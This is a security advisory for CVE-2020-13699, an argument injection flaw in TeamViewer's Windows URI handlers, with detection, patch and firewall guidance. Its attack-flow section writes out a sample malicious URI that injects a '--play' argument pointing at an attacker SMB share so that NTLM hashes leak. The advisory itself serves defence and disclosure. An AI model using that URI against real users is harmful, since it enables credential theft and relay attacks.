CVE-2020-13699 Overview
CVE-2020-13699 is an Argument Injection vulnerability in TeamViewer Desktop for Windows that stems from improper quoting of custom URI handlers. This security flaw allows attackers to craft malicious websites that can launch TeamViewer with arbitrary parameters, potentially leading to NTLM authentication request relay attacks or hash capture for offline password cracking.
Critical Impact
An attacker can force a victim to send NTLM authentication requests by simply visiting a malicious website, enabling credential theft through relay attacks or offline hash cracking.
Affected Products
- TeamViewer Desktop for Windows versions before 15.8.3
- TeamViewer versions 8.x, 9.x, 10.x, 11.x, 12.x, 13.x, and 14.x (prior to patched versions)
- Microsoft Windows (all versions running vulnerable TeamViewer instances)
Discovery Timeline
- July 29, 2020 - CVE-2020-13699 published to NVD
- November 21, 2024 - Last updated in NVD database
Technical Details for CVE-2020-13699
Vulnerability Analysis
This vulnerability exists because TeamViewer Desktop for Windows fails to properly quote its custom URI handlers when processing parameters. The flaw is classified under CWE-88 (Improper Neutralization of Argument Delimiters in a Command), commonly known as Argument Injection.
When a user visits a malicious website, the attacker can construct a specially crafted URI that triggers TeamViewer to launch with arbitrary parameters. The vulnerability specifically affects the --play parameter handling, which can be abused to initiate outbound SMB connections to attacker-controlled servers.
The attack requires user interaction—the victim must visit a malicious webpage—but no authentication or special privileges are required from the attacker's perspective. Once triggered, the attack can lead to full compromise of user credentials through NTLM relay or hash capture techniques.
Root Cause
The root cause is inadequate input sanitization in the URI handler registration for TeamViewer. The application registers multiple custom URI schemes (teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1) without proper quoting of parameters passed through these handlers.
When Windows processes these URI schemes, it passes the entire URI string to TeamViewer. Without proper quoting, an attacker can inject additional command-line arguments that the application will interpret as legitimate parameters.
Attack Vector
The attack is network-based and requires user interaction. An attacker hosts a malicious website containing a crafted iframe or link with a TeamViewer URI scheme. The attack flow is as follows:
- The attacker creates a malicious webpage containing a URI such as teamviewer10: --play \\attacker-server\share\file
- When the victim visits the page, the browser prompts to open TeamViewer
- If the victim accepts, TeamViewer launches with the injected --play parameter pointing to an attacker-controlled SMB share
- TeamViewer attempts to access the remote share, automatically sending the victim's NTLM credentials
- The attacker can relay these credentials to other services or capture the hash for offline cracking
The vulnerability affects multiple URI handlers, expanding the attack surface significantly and providing attackers with numerous vectors to exploit this weakness.
Detection Methods for CVE-2020-13699
Indicators of Compromise
- Unexpected outbound SMB (port 445) connections to external IP addresses from TeamViewer processes
- TeamViewer process launched with unusual command-line arguments, particularly the --play parameter with UNC paths
- Browser logs showing navigation to TeamViewer URI schemes from untrusted domains
- Windows event logs indicating SMB authentication attempts to unknown external hosts
Detection Strategies
- Monitor process creation events for TeamViewer.exe with suspicious command-line arguments containing UNC paths or the --play parameter
- Implement network traffic analysis to detect outbound SMB traffic to non-corporate IP addresses
- Deploy endpoint detection rules to alert on TeamViewer processes initiating connections to external SMB shares
- Configure web proxies to log and alert on pages attempting to invoke TeamViewer URI schemes
Monitoring Recommendations
- Enable verbose logging for TeamViewer application activity and monitor for anomalous connection attempts
- Implement SIEM correlation rules to detect the combination of browser-initiated TeamViewer launches followed by outbound SMB traffic
- Review DNS logs for resolution of unusual hostnames associated with SMB share access
- Monitor Windows Security Event ID 4648 (explicit credential logon) events correlated with TeamViewer process activity
How to Mitigate CVE-2020-13699
Immediate Actions Required
- Update TeamViewer immediately to version 15.8.3 or later for version 15.x installations
- Apply appropriate patches for legacy versions: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, or 14.7.48350
- Block outbound SMB traffic (port 445) at the perimeter firewall for workstations running TeamViewer
- Educate users about the risks of clicking "Open" when prompted by browsers for external application handlers
Patch Information
TeamViewer has released security patches addressing this vulnerability across all supported product versions. The fixed versions properly quote URI handler parameters to prevent argument injection. Refer to the TeamViewer Security Announcement for complete patch details.
| Version Branch | Fixed Version |
|---|---|
| 15.x | 15.8.3 |
| 14.7.x | 14.7.48350 |
| 14.2.x | 14.2.56676 |
| 13.x | 13.2.36220 |
| 12.x | 12.0.258869 |
| 11.x | 11.0.258870 |
| 10.x | 10.0.258873 |
| 9.x | 9.0.258860 |
| 8.x | 8.0.258861 |
Workarounds
- Disable or unregister TeamViewer URI handlers in the Windows registry if immediate patching is not possible
- Implement Windows Firewall rules to block outbound SMB connections from the TeamViewer executable
- Configure Group Policy to prevent browsers from launching external applications without explicit user confirmation
- Consider network segmentation to prevent workstations from initiating direct SMB connections to external networks
# Windows Firewall rule to block outbound SMB from TeamViewer
netsh advfirewall firewall add rule name="Block TeamViewer SMB" dir=out action=block protocol=tcp remoteport=445 program="%ProgramFiles%\TeamViewer\TeamViewer.exe"
netsh advfirewall firewall add rule name="Block TeamViewer SMB x86" dir=out action=block protocol=tcp remoteport=445 program="%ProgramFiles(x86)%\TeamViewer\TeamViewer.exe"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
